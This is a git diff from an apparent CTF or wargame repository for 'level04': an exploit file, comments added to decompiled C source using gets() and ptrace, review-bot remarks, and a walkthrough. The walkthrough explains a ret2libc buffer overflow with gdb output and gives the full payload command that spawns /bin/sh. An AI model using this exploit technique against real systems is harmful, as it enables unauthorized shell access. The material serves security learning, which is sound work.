diff --git a/level04/ressources/exploit b/level04/ressources/exploit
new file mode 100644
index 0000000..80767a8
--- /dev/null
+++ b/level04/ressources/exploit
@@ -0,0 +1 @@
+(python -c 'print "A" * 156 + "\xd0\xae\xe6\xf7" + "A" * 4 + "\xec\x97\xf8\xf7"'; cat) | ./level04
diff --git a/level04/source.c b/level04/source.c
index c27b7f1..ca1204a 100644
--- a/level04/source.c
+++ b/level04/source.c
@@ -13,7 +13,7 @@ int main(void)
 pid = fork();
 memset(s, 0, sizeof(s));
- if (pid) {
+ if (pid) { // parent code
 do {
 wait(&wstatus);
 if (WIFSIGNALED(wstatus) ||
@@ -23,10 +23,10 @@ int main(void)
 }
 } while (ptrace(PTRACE_PEEKUSER, pid, 44, 0) != 11);
 puts("no exec() for you");
- kill(pid, 9);
- } else {
- prctl(1, 1);
- ptrace(PTRACE_TRACEME, 0, 0, 0);
+ kill(pid, SIGKILL);
+ } else { // child code
+ prctl(1, PR_SET_PDEATHSIG);
+ ptrace(PTRACE_TRACEME, 0, NULL, NULL);
 puts("Give me some shellcode, k");
 gets(s);
 }
diff --git a/level04/walkthrough b/level04/walkthrough
new file mode 100644
index 0000000..64e476b
--- /dev/null
+++ b/level04/walkthrough
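Review bot: The two address constants embedded in the payload are not documented in this file; the walkthrough shows they are the `system()` and `"/bin/sh"` locations read with gdb from /lib32/libc-2.15.so on a machine with ASLR disabled, so the line only works against that exact environment. A comment above the command, `# addresses resolved in level04/walkthrough (libc-2.15, 32-bit, ASLR disabled)`, would record that dependency for anyone reading the file on its own.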
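Review bot: `prctl(1, PR_SET_PDEATHSIG)` has the option and its argument swapped: PR_SET_PDEATHSIG is the first prctl() option (value 1) and the second argument is the signal to deliver when the parent dies, so the call is numerically identical to the original `prctl(1, 1)` but now reads as if 1 were the option and the constant were the signal; the readable form is `prctl(PR_SET_PDEATHSIG, SIGHUP);` since SIGHUP is the signal 1 the original requests. The same naming effort applied to SIGKILL could cover the remaining magic numbers in the context line `} while (ptrace(PTRACE_PEEKUSER, pid, 44, 0) != 11);` — on i386, 44 is the offset of regs.orig_eax in struct user and 11 is the execve syscall number, which `offsetof(struct user, regs.orig_eax)` (sys/user.h) and `SYS_execve` (sys/syscall.h) express directly. main() begins before this hunk and presumably continues after it.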
@@ -0,0 +1,51 @@
+# Level04
+
+Using hexrays, we can decompile the code and see that it does a `fork()` of the main process.
+The child process will call `gets()` which is a deprecated and unsafe function, vulnerable to buffer overflows.
+We can exploit this vulnerability to overflow `eip` and call `system()` function (the code has ASLR disabled so we can hardcode its address in our exploit).
+First, we need to find the offset between our buffer and `eip`. To achieve this, we're going to use gdb `set follow-fork-mode child` and (this EIP offset tool)[https://wiremask.eu/tools/buffer-overflow-pattern-generator/]. We get an offset of 156.
+Then we're going to overwrite the next 4 bytes (used for the return address of `system()`, which will be unused here so we don't care about its value). Finally we can write the address of our argument `"/bin/sh"` on the stack so that `system("/bin/sh")` executes.
+To find all these addresses, we're going to use gdb.
+Address of `system()`:
+```
+(gdb) p system
+$1 = {} 0xf7e6aed0
+```
+So its address is `0xf7e6aed0`.
+
+Address of `"/bin/sh"`:
+```
+(gdb) info proc map
+process 2205
+Mapped address spaces:
+
+ Start Addr End Addr Size Offset objfile
+ 0x8048000 0x8049000 0x1000 0x0 /home/users/level04/level04
+ 0x8049000 0x804a000 0x1000 0x0 /home/users/level04/level04
+ 0x804a000 0x804b000 0x1000 0x1000 /home/users/level04/level04
+ 0xf7e2b000 0xf7e2c000 0x1000 0x0
+ 0xf7e2c000 0xf7fcc000 0x1a0000 0x0 /lib32/libc-2.15.so
+ 0xf7fcc000 0xf7fcd000 0x1000 0x1a0000 /lib32/libc-2.15.so
+ 0xf7fcd000 0xf7fcf000 0x2000 0x1a0000 /lib32/libc-2.15.so
+ 0xf7fcf000 0xf7fd0000 0x1000 0x1a2000 /lib32/libc-2.15.so
+ 0xf7fd0000 0xf7fd4000 0x4000 0x0
+ 0xf7fda000 0xf7fdb000 0x1000 0x0
+ 0xf7fdb000 0xf7fdc000 0x1000 0x0 [vdso]
+ 0xf7fdc000 0xf7ffc000 0x20000 0x0 /lib32/ld-2.15.so
+ 0xf7ffc000 0xf7ffd000 0x1000 0x1f000 /lib32/ld-2.15.so
+ 0xf7ffd000 0xf7ffe000 0x1000 0x20000 /lib32/ld-2.15.so
+ 0xfffdd000 0xffffe000 0x21000 0x0 [stack]
+(gdb) find 0xf7e2c000,0xf7fd0000,"/bin/sh"
+0xf7f897ec
+1 pattern found.
+```
+So its address is `0xf7f897ec`.
+
+We can now build the exploit in 4 parts:
+- `"A"*156` => the offset to overflow the buffer until `eip`
+- `"\xd0\xae\xe6\xf7"` => `system()`'s address
+- `"A"*4` => the return address of `system()` (useless value but the offset is needed for the exploit)
+- `"\xec\x97\xf8\xf7"` => `"/bin/sh"`'s address.
+
+Here is the full command:
+`(python -c 'print "A" * 156 + "\xd0\xae\xe6\xf7" + "A" * 4 + "\xec\x97\xf8\xf7"'; cat) | ./level04`